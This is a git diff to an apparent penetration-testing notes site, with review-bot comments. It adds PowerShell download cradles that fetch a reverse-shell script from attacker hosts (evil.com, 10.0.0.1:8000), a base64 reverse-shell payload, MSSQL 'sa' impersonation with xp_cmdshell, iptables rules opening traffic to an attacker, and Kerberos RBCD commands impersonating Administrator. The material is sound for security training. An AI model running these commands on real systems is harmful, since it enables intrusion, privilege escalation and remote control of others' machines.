diff --git a/src/exploit/database/mssql-pentesting.md b/src/exploit/database/mssql-pentesting.md index d5f2d17..9589b74 100644 --- a/src/exploit/database/mssql-pentesting.md +++ b/src/exploit/database/mssql-pentesting.md @@ -7,7 +7,7 @@ tags: refs: - https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server - https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16 -date: 2024-04-01 +date: 2024-09-10 draft: false --- @@ -119,6 +119,16 @@ sqsh -S -U username -P password -D database > xp_dirtree 'C:\Users\' ``` +### Impersonate Other Users + +Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#impersonation-of-other-users) + +```bash +# Assume that the 'sa' user can be impersonated. +EXECUTE AS 'sa' +EXEC xp_cmdshell 'whoami' +``` +
## Spawn a Windows Command Shell and Run Commands using Impacket diff --git a/src/exploit/linux/post-exploitation/linux-backdoors.md b/src/exploit/linux/post-exploitation/linux-backdoors.md index f5a4f9e..314166f 100644 --- a/src/exploit/linux/post-exploitation/linux-backdoors.md +++ b/src/exploit/linux/post-exploitation/linux-backdoors.md @@ -4,7 +4,7 @@ description: After compromising a target machine, the adversary attempts to esta tags: - Privilege Escalation refs: -date: 2024-08-20 +date: 2024-09-10 draft: false --- @@ -280,14 +280,19 @@ nc -lvnp 4444 ## Option: Firewall Bypass -If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege. +If the target system applies firewall for preventing communications with external systems, we may bypass the settings by manipulating them. It requires root privilege. ```bash +# List the iptables settings +iptables --list + # ACCEPT: TARGET => ATTACKER +# OUTPUT 1: The first rule of the OUTPUT chain. # -d: Destination address iptables -I OUTPUT 1 -p tcp -d -j ACCEPT # ACCEPT: TARGET <= ATTACKER +# INPUT 1: The first rule of the INPUT chain. # -s: Source address iptables -I INPUT 1 -p tcp -s -j ACCEPT ``` diff --git a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md index 64339ad..304c140 100644 --- a/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md +++ b/src/exploit/reverse-engineering/cheatsheet/gdb-cheatsheet.md @@ -4,7 +4,7 @@ description: GDB (GNU Debugger) is a portable debugger used for reverse engineer tags: - Reverse Engineering refs: -date: 2024-08-28 +date: 2024-09-10 draft: false --- 
@@ -25,6 +25,37 @@ gdb ./example ## Commands in GDB +### Analysis + +```sh +# List functions. +info functions +``` + +### Breakpoints + +```bash +# Set a breakpoint at a specified line number, function, or address. +break main +b main +break *0x12345678 +# Add a breakpoint to the relative address position from the main function. +b *main+25 + +# Information about breakpoints +info breakpoints +i breakpoints +i b + +# Delete all breakpoints +delete breakpoints +d breakpoints +# Delete the specified breakpoint +delete +delete 1 +d 1 +``` + ### Debug ```bash @@ -59,30 +90,6 @@ set disassembly-flavor intel disass main ``` -### Breakpoints - -```bash -# Set a breakpoint at a specified line number, function, or address. -break main -b main -break *0x12345678 -# Add a breakpoint to the relative address position from the main function. -b *main+25 - -# Information about breakpoints -info breakpoints -i breakpoints -i b - -# Delete all breakpoints -delete breakpoints -d breakpoints -# Delete the specified breakpoint -delete -delete 1 -d 1 -``` - ### Values ```sh diff --git a/src/exploit/shell/reverse-shell-cheat-sheet.md b/src/exploit/shell/reverse-shell-cheat-sheet.md index 04eb6b5..21b5c3a 100644 --- a/src/exploit/shell/reverse-shell-cheat-sheet.md +++ b/src/exploit/shell/reverse-shell-cheat-sheet.md @@ -8,7 +8,7 @@ tags: refs: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -date: 2024-04-01 +date: 2024-09-10 draft: false --- 
@@ -133,6 +133,8 @@ powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234 powershell Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/revshell.ps1') +powershell -c "Invoke-Expression (Invoke-WebRequest -usebasicparsing http://10.0.0.1:8000/revshell.ps1)" + # Base64 encoded payload powershell -e JGNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgnMTAuMC4wLjEnLDEyMzQpOyRzdHJlYW0gPSAkY2xpZW50LkdldFN0cmVhbSgpO1tieXRlW11dJGJ5dGVzID0gMC4uNjU1MzV8JXswfTt3aGlsZSgoJGkgPSAkc3RyZWFtLlJlYWQoJGJ5dGVzLCAwLCAkYnl0ZXMuTGVuZ3RoKSkgLW5lIDApezskZGF0YSA9IChOZXctT2JqZWN0IC1UeXBlTmFtZSBTeXN0ZW0uVGV4dC5BU0NJSUVuY29kaW5nKS5HZXRTdHJpbmcoJGJ5dGVzLDAsICRpKTskc2VuZGJhY2sgPSAoaWV4ICRkYXRhIDI+JjEgfCBPdXQtU3RyaW5nICk7JHNlbmRiYWNrMiA9ICRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKCk= diff --git a/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md b/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md index 6d8e56a..cb126ff 100644 --- a/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md +++ b/src/exploit/windows/active-directory/resource-based-constrained-delegation-attack.md @@ -1,5 +1,5 @@ --- -title: Resource-Based Constrained Delegation Attack +title: RBCD (Resource-Based Constrained Delegation) Attack description: Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer. tags: - Active Directory @@ -7,7 +7,7 @@ tags: - Windows refs: - https://github.com/tothi/rbcd-attack -date: 2023-02-18 +date: 2024-09-10 draft: false --- 
@@ -27,7 +27,7 @@ To achieve this attack successfully, we need the following conditions: ### 1. Create Fake Computer ```bash -impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password +impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password' ``` ### 2. Modify Delegation Rights @@ -35,9 +35,7 @@ impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -d We can use [rbcd.py](https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation) for abusing `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target. ```bash -rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password - -rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass +impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password' ``` ### 3. Get the Impersonated Service Ticket @@ -45,7 +43,9 @@ rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-fro Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc. ```bash -getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password +impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123' +# or +impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123' ``` ### 4. Use the Service Ticket 
@@ -68,3 +68,7 @@ klist # -no-pass: No password impacket-wmiexec example.local/Administrator@example.local -k -no-pass ``` + +- Dump credentials + + See [Dumping Windows Password Hashes](/exploit/windows/privilege-escalation/dumping-windows-password-hashes/) \ No newline at end of file diff --git a/src/exploit/windows/active-directory/smb-pentesting.md b/src/exploit/windows/active-directory/smb-pentesting.md index f3b129a..82cd22c 100644 --- a/src/exploit/windows/active-directory/smb-pentesting.md +++ b/src/exploit/windows/active-directory/smb-pentesting.md @@ -5,7 +5,7 @@ tags: - Active Directory - Windows refs: -date: 2024-08-11 +date: 2024-09-10 draft: false ---
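Review bot: in the `mssql-pentesting.md` hunk that adds "Impersonate Other Users", `EXECUTE AS 'sa'` is not valid T-SQL: the statement needs the principal class, i.e. `EXECUTE AS LOGIN = 'sa'` (or `EXECUTE AS USER = '...'` for a database user), which is also the form the linked HackTricks section shows. The block is T-SQL typed into the `sqsh` session shown just above it, so the fence should be tagged `sql` rather than `bash`, and a closing `REVERT` line would show the reader how to drop back to the original security context instead of leaving the session running as `sa`.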
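Review bot: in the `linux-backdoors.md` Firewall Bypass hunk, `iptables -I OUTPUT 1 -p tcp -d -j ACCEPT` and `iptables -I INPUT 1 -p tcp -s -j ACCEPT` are missing the address that `-d` and `-s` take, so the lines fail to parse as written; a labelled placeholder such as `-d <ATTACKER_IP>` / `-s <ATTACKER_IP>` would make them runnable and match the `# -d: Destination address` comments. The prose line in this hunk is identical before and after (a trailing-whitespace change); if it is being touched anyway, "applies a firewall to prevent communication with external systems" reads better. Since the hunk now documents `iptables --list`, it is worth adding that this shows only the `filter` table (`-t nat` and friends are separate), that on nftables-based hosts `nft list ruleset` is the complete view, and that rules inserted this way are visible in `iptables -S` and are lost on reboot unless explicitly saved.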
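Review bot: in the `gdb-cheatsheet.md` hunk that adds the Analysis section and moves Breakpoints, the bare `delete` line sits under `# Delete the specified breakpoint` but takes no argument, so it deletes all breakpoints (same as `delete breakpoints`); move it up under `# Delete all breakpoints` or drop it. The new `### Analysis` block is fenced `sh` while the neighbouring Breakpoints and Debug blocks use `bash`; one tag per file keeps the cheat sheet consistent. The second hunk in this file only removes the old Breakpoints section that is re-added above Debug, so the move itself is clean.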
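Review bot: in the `reverse-shell-cheat-sheet.md` hunk, the added `powershell -c "Invoke-Expression (Invoke-WebRequest -usebasicparsing http://10.0.0.1:8000/revshell.ps1)"` line is a second download cradle directly under the `DownloadString` one with no comment explaining the difference; if it is kept, note that `-UseBasicParsing` exists to skip the Internet Explorer DOM parser in Windows PowerShell 5.1 and is a no-op in PowerShell 6+, and use the same host placeholder as the line above (`evil.com` vs `10.0.0.1:8000`). For readers assessing detection, both lines are the classic `Invoke-Expression` download-cradle pattern that PowerShell script block logging (Event ID 4104) records, which is worth a one-line remark in the block.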
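Review bot: in the `resource-based-constrained-delegation-attack.md` step 2 hunk, `impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' ... 'example.local/username:password'` does not say what `DC$` is or why `username` can perform the write; a comment such as `# DC$: the target computer account; 'username' must have write access to its msDS-AllowedToActOnBehalfOfOtherIdentity attribute` would tie the command to the preconditions listed under "we need the following conditions" and to step 3, whose `-spn 'cifs/dc.example.local'` only works if that SPN belongs to the same account written here. The switch from the two `rbcd.py` invocations (which contradicted each other in target and direction) to a single `impacket-rbcd` line is a clear improvement.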
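Review bot: in the step 3 hunk of the same RBCD file, `-impersonate Administrator` deserves a caveat next to it: S4U2proxy is refused when the impersonated account is marked "Account is sensitive and cannot be delegated" or is a member of Protected Users, so `impacket-getST` fails for such accounts and that setting is the defensive control for this technique; saying so here explains the most common failure a reader will hit. It would also help to state that `getST` writes the ticket to a `.ccache` file that step 4 expects to be exported via `KRB5CCNAME` before `impacket-wmiexec ... -k -no-pass` is run.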
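Review bot: the final hunk in the RBCD file appends `- Dump credentials` right after the `impacket-wmiexec` fenced block under "### 4. Use the Service Ticket" with no heading of its own, so it reads as part of step 4; give it a `### 5.` heading to match the numbered steps, or a short lead sentence. The file now also ends without a trailing newline (`\ No newline at end of file`), unlike the other files in this patch; add one.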